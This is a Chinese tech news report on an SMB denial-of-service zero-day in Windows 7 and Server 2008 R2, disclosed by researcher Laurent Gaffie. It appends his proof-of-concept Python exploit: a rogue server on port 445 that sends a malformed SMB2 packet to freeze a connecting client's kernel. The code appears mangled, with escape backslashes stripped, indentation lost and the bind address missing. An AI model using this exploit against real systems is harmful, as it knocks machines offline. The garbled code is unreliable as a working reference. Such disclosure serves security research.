Windows7再曝零日漏洞 微软称正在调查(附溢出程序)

微软昨日证实，有报告指出Windows 7和Windows Server 2008 R2中存在一个漏洞，可被用来进行远程攻击系统，并导致系统内核崩溃，微软目前正在就此问题进行调查。

微软官方发言人表示，此漏洞为Windows网络文件和打印共享协议Server Message Block（SMB）中存在的拒绝式服务漏洞，不过迄今为止微软还没有发现利用此漏洞实施攻击行为的案例。

安全专家Laurent Gaffie昨日在博客中曝光了这一漏洞，并将其定级为中高级别漏洞，Laurent Gaffie表示这个漏洞会导致SMB协议进入无限死循环，他还进行了完整代码演示。目前还没有任何修复该漏洞的补丁，Gaffie建议用户在微软发布相关补丁前关闭SMB功能和端口。

Gaffie指出，无论你的防火墙是如何设置的，黑客都有可能在局域网内或是利用IE对你的系统进行攻击。Gaffie表示，该漏洞仅影响Windows 7和Windows Server 2008 R2，并不对其它系统造成影响。

附代码演示：

#win7-crash.py:

#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)

#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.

#NO BSOD, YOU GOTTA PULL THE PLUG.

#To trigger it fast; from the target: \this_script_ip_addrBLAH , instantly crash

#Author: Laurent Gaffié

#

import SocketServer

packet = "x00x00x00x9a" # ---> length should be 9e not 9a..

"xfex53x4dx42x40x00x00x00x00x00x00x00x00x00x01x00"

"x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"

"x41x00x01x00x02x02x00x00x30x82xa4x11xe3x12x23x41"

"xaax4bxadx99xfdx52x31x8dx01x00x00x00x00x00x01x00"

"x00x00x01x00x00x00x01x00xcfx73x67x74x62x60xcax01"

"xcbx51xe0x19x62x60xcax01x80x00x1ex00x20x4cx4dx20"

"x60x1cx06x06x2bx06x01x05x05x02xa0x12x30x10xa0x0e"

"x30x0cx06x0ax2bx06x01x04x01x82x37x02x02x0a"

class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address

print "THANKS SDL"

input = self.request.recv(1024)

self.request.send(packet)

self.request.close()

launch = SocketServer.TCPServer((, 445),SMB2)# listen all interfaces port 445

launch.serve_forever()